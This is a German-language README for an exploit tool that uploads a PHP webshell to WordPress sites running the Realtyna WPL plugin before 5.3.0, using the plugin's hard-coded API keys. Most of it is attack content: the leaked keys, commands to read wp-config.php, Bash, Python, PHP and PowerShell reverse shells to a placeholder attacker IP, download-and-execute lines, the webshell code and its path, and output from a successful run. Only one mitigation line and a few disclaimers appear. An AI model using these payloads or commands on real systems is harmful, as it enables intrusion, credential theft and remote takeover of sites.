
Nicht authentifizierter RCE-Exploit für Realtyna WPL < 5.3.0, der eine PHP-Webshell über einen fest codierten API-Schlüssel hochlädt und beliebige Systembefehle ausführt.
Dieser Exploit zielt auf eine kritische Schwachstelle in den Versionen vor 5.3.0 des Plugins Realtyna Organic IDX + WPL Real Estate ab. Das Plugin verwendet fest verdrahtete Zugangsdaten und erlaubt nicht authentifizierte Datei-Uploads, was zu Remote Code Execution (RCE) führt.
Das Plugin verfügt über eine standardmäßig aktivierte I/O-API mit fest verdrahteten Zugangsdaten:
io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7wio_private_key = Eft76bdh0o2uyhJkbG3TDie API validiert keine Dateitypen, was das Hochladen beliebiger PHP-Dateien ermöglicht.
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit
# Install dependencies
pip install requests urllib3
# Upload webshell only
python exploit.py -u https://target.com/wordpress
# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"
# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id" # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo" # Windows
# System information
python exploit.py -u https://target.com -c "uname -a"
# Current user
python exploit.py -u https://target.com -c "whoami"
# List files
python exploit.py -u https://target.com -c "ls -la"
# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"
# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"
# System information
python exploit.py -u https://target.com -c "systeminfo"
# Current user
python exploit.py -u https://target.com -c "whoami"
# List files
python exploit.py -u https://target.com -c "dir"
# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"
# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"
# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"
<?php system($_GET['c']); ?>)wp-content/uploads/WPL/<ID>/shell.phpshell.php?c=COMMAND/wp-content/uploads/WPL/*/wplview=io, wplformat=io, cmd=set_property// Add to wp-config.php
define('WPL_IO_STATUS', 0);
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg
Dieser Exploit dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Die nicht autorisierte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch.
Dieses Projekt dient ausschließlich Bildungszwecken. Nutzung auf eigene Gefahr.
Reichen Sie gerne Issues und Pull Requests für Verbesserungen ein.
Bei Problemen und Fragen eröffnen Sie bitte ein Issue auf GitHub.
⚠️ WARNUNG: Dieses Tool dient ausschließlich der Sicherheitsforschung und zu Bildungszwecken. Holen Sie immer die entsprechende Genehmigung ein, bevor Sie ein System testen.